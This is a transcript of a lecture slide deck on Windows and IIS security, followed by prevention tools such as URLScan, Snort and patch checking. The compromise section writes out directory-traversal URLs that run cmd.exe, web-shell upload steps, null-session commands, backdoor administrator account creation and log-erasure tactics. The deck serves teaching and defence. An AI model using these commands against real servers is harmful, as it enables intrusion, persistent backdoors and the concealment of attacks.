Windows Security Analysis - PowerPoint PPT Presentation

Slides: 68
Provided by: mattcookht

Transcript and Presenter's Notes

1
Windows Security Analysis
Computer Science E-Commerce Security
Matthew Cook
http://escarpment.net/
2
Introduction
  • Loughborough University
  • http://www.lboro.ac.uk/computing/
  • Janet Web Cache Service
  • http://wwwcache.ja.net/

3
Windows Security Analysis
  • Introduction
  • Step-by-step Machine Compromise
  • Preventing Attack
  • Further Reading
  • The Future

4
Introduction
  • Physical Security
  • Security Threats
  • Hacker or Cracker
  • The Easiest Security Improvement
  • Can you buy security?

5
Physical Security
  • Secure Location
  • BIOS restrictions
  • Password Protection
  • Boot Devices
  • Case Locks
  • Case Panels

6
Security Threats
  • Denial of Service
  • Theft of information
  • Modification
  • Fabrication (Spoofing or Masquerading)

7
Security Threats
  • Why a compromise can occur
  • Physical Security Holes
  • Software Security Holes
  • Incompatible Usage Security Holes
  • Social Engineering
  • Complacency

8
Hacker or Cracker
  • "Hacker" is used primarily by the media to describe
    malicious attacks by individuals
  • However, the computing community uses "Cracker" to
    mean the same
  • A Hacker tinkers with systems for good
    purposes (not breaking the law)
  • To avoid confusion many people now say "A machine
    has been compromised!" not "A machine has been
    hacked!"

9
The Easiest Security Improvement
  • Good passwords
  • Usernames and Passwords are the primary security
    defence
  • Use a password that is easy to type to avoid
    Shoulder Surfers
  • Use the first letters from song titles, song
    lyrics or film quotations

10
Can you buy Security?
  • "This system is secure." A product vendor might
    say "This product makes your network secure."
    Or "We secure e-commerce." Inevitably, these
    claims are naïve and simplistic. They look at the
    security of the product, rather than the security
    of the system. The first questions to ask are
    "Secure from whom?" and "Secure against what?"
  • Bruce Schneier

11
Step-by-step Machine Compromise
  • Background
  • Gathering Information
  • Identifying System Weakness
  • Exploiting the Security Hole
  • Gaining Root
  • Backdoor Access
  • System Alteration
  • Audit Trail Removal

12
Background
  • Reasons for Attack
  • Personal Issues
  • Political Statement
  • Financial Gain (Theft of money, information)
  • Learning Experience
  • DoS (Denial of Service)
  • Support for Illegal Activity
  • In our scenario we are going to attack the
    company laggyband.com

13
Gathering Information
  • Companies House
  • Internet Search: URL http://www.google.co.uk
  • Whois: URL http://www.netsol.com/cgi-bin/whois/whois
  • A Whois query can provide
  • The Registrant
  • The Domain Names Registered
  • The Administrative, Technical and Billing Contact
  • Record updated and created date stamps
  • DNS Servers for the Domain

14
Gathering Information
  • Use nslookup or dig
  • dig @dns.laggyband.com www.laggyband.com
  • Different query types available
  • A: Network address
  • ANY: All information available
  • MX: Mail exchange records
  • SOA: Zone of Authority
  • HINFO: Host information
  • AXFR: Zone transfer
  • TXT: Additional strings

15
Identifying System Weakness
  • Many products available
  • Nmap
  • Nessus
  • Pandora
  • Pwdump
  • L0pht Crack
  • Null Authentication

16
Nmap
  • Port Scanning Tool
  • Stealth scanning, OS Fingerprinting
  • Open Source
  • Runs under Unix based OS
  • Port under development for Win32
  • URL http://www.insecure.org/nmap/

17
Nmap
18
Nessus
  • Remote security scanner similar to Typhon
  • Very comprehensive
  • Frequently updated modules
  • Testing of DoS attacks
  • Open Source
  • Win32 and Java Client
  • URL http://nessus.org/

19
Pandora
  • Not strictly Windows Security
  • Runs on either Unix or Win32
  • Excellent tool to evaluate Netware security
  • Open Source
  • Lots of additional information
  • URL http://www.nmrc.org/pandora/

20
pwdump
  • Version 3 (e = encrypted)
  • Developed by Phil Staubs and Erik Hjelmstad
  • Based on pwdump and pwdump2
  • URL http://www.ebiz-tech.com/html/pwdump.html
  • Needs Administrative Privileges
  • Extracts hashes even if syskey is installed
  • Extracts from remote machines
  • Identifies accounts with no password
  • Self-contained utility

21
L0pht Crack
  • Password Auditing and Recovery
  • Crack Passwords from many sources
  • Registration $249
  • URL http://www.atstake.com/research/lc3/

22
L0pht Crack
  • Crack Passwords from
  • Local Machine
  • Remote Machine
  • SAM File
  • SMB Sniffer
  • PWDump file

23
Nmap Analysis
  • nmap -sP 158.125.0.0/16
  • Dependent on ICMP (Internet Control Message
    Protocol)
  • nmap -sP -PT80 158.125.0.0/16
  • Dependent on a TCP SYN/ACK packet

24
Nmap Analysis
  • TCP Connect Scan
  • Completes a Three Way Handshake
  • Very noisy (Detection by IDS)

25
Nmap Analysis
  • TCP SYN Scan
  • Half open scanning (Full port TCP connection not
    made)
  • Less noisy than the TCP Connect Scan

26
Nmap Analysis
  • TCP FIN Scan
  • FIN Packet sent to target port
  • RST returned for all closed ports
  • Mostly works on UNIX-based TCP/IP stacks
  • TCP Xmas Tree Scan
  • Sends a FIN, URG and PUSH packet
  • RST returned for all closed ports
  • TCP Null Scan
  • Turns off all flags
  • RST returned for all closed ports
  • UDP Scan
  • UDP Packet sent to target port
  • ICMP Port Unreachable for closed ports
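As an added example that is not part of the original slides, the Python below models the stack replies described above, showing why FIN, Xmas and Null probes only yield results against RFC-compliant (UNIX-style) stacks, and then applies the per-source distinct-port count that an IDS such as Snort uses to flag a stealth scan. The two stack models, the packet tuple layout and the threshold are simplifying assumptions of this example.

```python
from collections import defaultdict
from typing import Optional

# TCP flag bits; PROBES maps each nmap scan type to the flag set it sends
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
PROBES = {"syn": SYN, "fin": FIN, "xmas": FIN | PSH | URG, "null": 0}

def stack_response(probe: str, port_open: bool, stack: str) -> Optional[int]:
    """Simplified model of a target's reply to one probe (None = silently dropped).
    'rfc793': drop FIN/Xmas/Null on open ports, RST on closed (typical UNIX stack).
    'windows': assumption modelling NT/2000, which answers RST to those probes either way."""
    if probe == "syn":
        return SYN | ACK if port_open else RST | ACK
    if stack == "windows" or not port_open:
        return RST | ACK
    return None

def scan(probe: str, ports, open_ports, stack: str) -> dict:
    """Scanner-side inference per port: 'open', 'closed' or 'open|filtered'."""
    result = {}
    for p in ports:
        reply = stack_response(probe, p in open_ports, stack)
        if probe == "syn":
            result[p] = "open" if reply == SYN | ACK else "closed"
        else:  # no reply is ambiguous: the port is open, or a firewall dropped the probe
            result[p] = "closed" if reply is not None else "open|filtered"
    return result

def classify_probe(flags: int) -> Optional[str]:
    """IDS side: name the scan type whose flag set exactly matches an unsolicited packet."""
    return next((name for name, bits in PROBES.items() if flags == bits), None)

def detect_scans(packets, threshold: int = 5) -> dict:
    """packets: (src, dst, dport, flags). Flag a source once it has sent the same
    probe type to at least `threshold` distinct ports on one host (threshold is assumed)."""
    seen = defaultdict(set)
    for src, dst, dport, flags in packets:
        kind = classify_probe(flags)
        if kind is not None:
            seen[(src, dst, kind)].add(dport)
    return {k: sorted(v) for k, v in seen.items() if len(v) >= threshold}
```

Against the "windows" model every port comes back "closed" under a FIN scan, which is the practical reason the slide says these scans mostly work on UNIX stacks.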

27
Null Authentication
  • Null Authentication
  • net use \\camford\IPC$ "" /u:""
  • Famous tools like Red Button
  • net view \\camford
  • List of users, groups and shares
  • Last logged-on date
  • Last password change
  • Much more

28
Exploiting the Security Hole
  • Using IIS Unicode/Directory Traversal
  • /scripts/../../winnt/system32/cmd.exe?/c+dir
  • /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
  • Displays the listing of C: in the browser
  • Copy cmd.exe to /scripts/root.exe
  • Echo upload.asp
  • GET /scripts/root.exe?/c+echo+blah>upload.asp
  • Upload cmdasp.asp using upload.asp
  • Still vulnerable on 24% of E-Commerce servers

29
Gaining Root
  • Cmdasp.asp provides a cmd shell in the SYSTEM
    context
  • Increase in privileges is now simple
  • ISAPI.dll RevertToSelf (Horovitz)
  • Version 2 coded by Foundstone
  • http://camford/scripts/idq.dll?
  • Patch Bulletin MS01-26
  • NOT included in Windows 2000 SP2

30
Backdoor Access
  • Create several user accounts
  • net user iisservice <pass> /ADD
  • Net localgroup administrators iisservice /ADD
  • Add root shells on high end ports
  • Tini is 3Kb in size
  • Add backdoors to Run registry keys

31
System Alteration
  • Web page alteration
  • Information Theft
  • Enable services
  • Add VNC
  • Creating a Warez Server
  • Net start msftpsvc
  • Check access
  • Upload file 1Mb in size
  • Advertise as a warez server

32
Audit Trail Removal
  • Many machines have auditing disabled
  • Main problems are IIS logs
  • DoS IIS before logs sync to disc
  • Erase logs from hard disc
  • Erasing Eventlog harder
  • IDS Systems
  • Network Monitoring at firewall

33
Preventing Attack
  • NetBIOS/SMB Services
  • Hfnetchk and Qchain
  • SNMP Vulnerabilities
  • Active Directory Vulnerabilities
  • IPSec
  • IIS Security
  • IDS Snort
  • .NET Server

34
NetBIOS/SMB Services
  • NetBIOS Browsing Request UDP 137
  • NetBIOS Browsing Response UDP 138
  • NetBIOS Communications TCP 135
  • CIFS TCP 139, 445 UDP 445
  • Port 445 Windows 2000 only
  • Block ports at firewall
  • Netstat -A

35
NetBIOS/SMB Services
  • To disable NetBIOS
  • Select Disable NetBIOS in the WINS tab of
    advanced TCP/IP properties.
  • Deselect File and Print sharing in the advanced
    settings of the Network and Dial-up connections
    window

36
NetBIOS/SMB Services
  • Disable Null Authentication
  • Key similar to Windows NT 4.0
  • HKLM\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous
  • REG_DWORD set to 0, 1 or 2!
  • HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\RestrictAnonymous
  • REG_DWORD set to 0 or 1

37
Hfnetchk
  • Use Hfnetchk to check hot fixes
  • Checks machines against Microsoft XML
  • Automate the process using batch files and a
    mail client (Postie)
  • URL http://www.infradig.com/infradig/postie/
  • Use QChain to chain hot fixes together without
    rebooting in-between.

38
Hfnetchk
  • Patch details for
  • Windows NT 4.0, 2000, XP, .NET server
  • IIS 4, IIS 5 and IIS 6
  • SQL Server 7.0
  • SQL Server 2000
  • Internet Explorer 5.01 (and later)

39
Hfnetchk
  • Default scan of local host (pre-downloaded XML):
    hfnetchk -x mssecure.xml
  • Default scan of lboro domain: hfnetchk -d lboro
  • Verbose scan of local host: hfnetchk -v -x
    mssecure.xml
  • Verbose scan including installed hot fixes:
    hfnetchk -v -a b -x mssecure.xml

40
SNMP Vulnerabilities
  • Simple Network Management Protocol
  • Snmpwalk camford public .1.3.6.1.4.1.77.1.2.25
  • SNMP Utilities in Resource Kit
  • Turn off SNMP services
  • Set community names
  • Set accepted hosts

41
SNMP Vulnerabilities
42
SNMP Vulnerabilities
  • CERT Advisory Tuesday 12th February
  • Privilege Escalation, DoS, Instability
  • Block UDP 161 and 162 at firewall
  • Patch or disable SNMP
  • Patches available for Windows 2000 and XP
  • URL http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms02-006.asp

43
AD Vulnerabilities
  • Listing of AD contents using ldp.exe
  • Ldp is contained on the Resource Kit
  • Authenticated connection needed
  • Filter TCP 389 (LDAP) and 3268 (GC)
  • DNS: secure zone transfers to slave name
    servers only

44
IPSec
  • IP security
  • Linux Connectivity using FreeS/WAN
  • Mainly for wireless use
  • WEP encryption cracked
  • URL http://www.freeswan.org/
  • URL http://airsnort.sourceforge.net/

45
IIS Security
  • History
  • Recent Worms
  • IIS Lock Down Tool
  • URL Scan
  • The Future

46
IIS History
  • IIS 2.0 Installed by NT 4.0
  • IIS 3.0 followed by more common IIS 4.0
  • Quickly gained reputation for (in)security
  • IIS 5.0 Installed by Windows 2000
  • IIS 6.0 Installed by .NET Server
  • Microsoft releases Hfnetchk
  • Closely followed by IIS Lockdown and URLScan

47
Recent Worms
  • Sadmind/IIS: Directory Traversal (Unicode Exploit)
  • CodeRed: ida/idq buffer overflow
  • CodeGreen: ida/idq buffer overflow
  • Nimda: Directory Traversal (Unicode Exploit)

48
Sadmind/IIS
  • 2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80
    GET /scripts/root.exe /c+echo+<html><body bgcolor=black><br><br><br><br><br><br><table width=100><td><p align="center"><font size=7 color=red>fUSAGovernment</font><tr><td><p align="center"><font size=7 color=red>fPoizonBOx<tr><td><p align="center"><font size=4 color=red>contactsysadmcn@yahoo.com.cn</html>>../wwwroot/default.htm 200 -
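The Sadmind/IIS entry above is the kind of request a defender hunts for in the W3C logs. As an added example (not code from the original deck), the Python below re-creates the canonicalisation mistake behind the Unicode traversal, contrasting a strict-decode check with one that folds overlong UTF-8 the way unpatched IIS did, and then runs that check plus a cmd.exe/root.exe test over constructed IIS-style log lines; the sample lines, the field layout and the function names are assumptions of this example.

```python
import re
from urllib.parse import unquote, unquote_to_bytes
# Constructed IIS W3C-style log lines (not from the deck); the 2nd and 3rd mimic the
# Unicode traversal and root.exe requests described on the slides.
SAMPLE_LOG = """\
2001-05-03 22:30:01 10.0.0.5 - 192.0.2.10 80 GET /default.htm - 200 -
2001-05-03 22:31:12 203.0.113.7 - 192.0.2.10 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200 -
2001-05-03 22:34:49 203.0.113.7 - 192.0.2.10 80 GET /scripts/root.exe /c+echo+x>../wwwroot/default.htm 200 -
"""
LOG_RE = re.compile(r"^(?P<ts>\S+ \S+) (?P<src>\S+) - \S+ \d+ \S+ (?P<uri>\S+) \S+ \d+")

def decode_overlong(uri: str) -> str:
    """Percent-decode, then fold 2-byte overlong UTF-8 (%c0%af -> '/', %c1%9c -> '\\').
    A strict decoder rejects these; unpatched IIS accepted them when mapping the path
    to the file system, so this reproduces the path the file system actually saw."""
    raw, out, i = unquote_to_bytes(uri), bytearray(), 0
    while i < len(raw):
        if raw[i] in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(((raw[i] & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(raw[i])
            i += 1
    return out.decode("latin-1")

def escapes_root(path: str) -> bool:
    """Canonicalise '.' and '..' segments; True if the path climbs above its root."""
    depth = 0
    for seg in path.replace("\\", "/").split("/"):
        depth += -1 if seg == ".." else (1 if seg and seg != "." else 0)
        if depth < 0:
            return True
    return False

def naive_check(uri: str) -> bool:  # strict decode only: the pre-patch IIS mistake
    return escapes_root(unquote(uri))

def hardened_check(uri: str) -> bool:  # fold overlong forms before canonicalising
    return escapes_root(decode_overlong(uri))

def scan_log(text: str) -> list:
    """Return (timestamp, source, reason) for each request a defender should flag."""
    hits = []
    for m in filter(None, map(LOG_RE.match, text.splitlines())):
        uri = m.group("uri")
        if hardened_check(uri):
            hits.append((m.group("ts"), m.group("src"), "directory traversal"))
        elif uri.lower().rsplit("/", 1)[-1] in ("cmd.exe", "root.exe"):
            hits.append((m.group("ts"), m.group("src"), "command shell request"))
    return hits
```

The naive check passes the %c0%af request because the strict decoder turns the overlong bytes into replacement characters and the segment is no longer "..", which is exactly the gap URLScan's encoding rules and the IIS patch close.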

49
IIS Lock Down Tool
  • Automatic lock down, now in its 2nd version
  • Locks down IIS 4.0 and IIS 5.0
  • Express lock down for simple web sites
  • Custom lock down for more complex servers
  • Undo facility to reverse last lock down
  • URL http://www.microsoft.com/Downloads/Release.asp?ReleaseID=32362

50
IIS Lock Down Tool
  • Disable
  • Active Server Pages
  • Index Server Interface
  • Server Side Includes
  • Internet Data Connector
  • Internet Printing
  • HTR Scripting
  • Remove
  • Sample Web Files
  • Script Virtual Directory
  • MSADC Directory
  • WebDAV
  • Set Permissions on
  • Exe files
  • Content Directories

51
URL Scan
  • ISAPI filter scans incoming HTTP requests
  • Filtered based on rule set
  • New rules easily added
  • Default urlscan.ini suitable for static pages
  • Restart service when changes made
  • Returns 404 and logs the request for matched rules
  • URL http://www.microsoft.com/Downloads/Release.asp?ReleaseID=32571

52
URL Scan
  • Filter on
  • The request method (verb)
  • File Extension
  • URL Encoding
  • Non ASCII characters
  • Malicious character sequence
  • Headers in HTTP GET

53
The Future
  • Gartner report recommends ditching IIS
  • Rewrite of IIS on the cards for version 6
  • Lock Down Tool (Interim Measures)
  • Httpd functionality in the kernel (TechEd)
  • IIS Lockdown included in SP3
  • Further implications for .NET

54
IDS Snort
  • IDS Intrusion Detection System
  • Libpcap packet sniffer and logger
  • Originally developed for the Unix platforms
  • Open Source
  • Port to Win32 available (Release 1.8.1)
  • Installation on Win32 in under 30 minutes
  • Run on your IIS server or standalone

55
IDS Snort
  • Snort can detect
  • Stealth Port Scans
  • CGI Attacks
  • Front Page Extensions Attacks
  • ICMP Activity
  • SMTP Activity
  • SQL Activity
  • SMB Probes

56
IDS Snort
  • Default logging to snort\logs\alert.ids
  • Log to mySQL and SQL Server
  • Notification as logs, winpopup, email etc
  • SnortSnarf or ACID (PHP based)
  • GUI IDS Center
  • URL http://snort.sourcefire.com/
  • URL http://www.cert.org/kb/acid/
  • URL http://www.silicondefense.com/

57
Snort
58
.NET Server
59
.NET Server
60
.NET Server
  • Mainly improvements in AD and Management
  • Blank passwords at console only
  • Improved command line tools
  • Evaluating Security on build 3590
  • IIS Currently secure from install
  • Auditing enabled by default
  • Integrated change log
  • XML Output

61
.NET Server
62
.NET Server
63
.NET Server
64
.NET Server
65
.NET Server
66
Further Reading
  • Schneier, B. Secrets & Lies (Digital Security in
    a Networked World), ISBN 0471253111
  • Hacking Exposed series, McGraw-Hill
  • Security Focus
  • Bugtraq
  • Google

67
Questions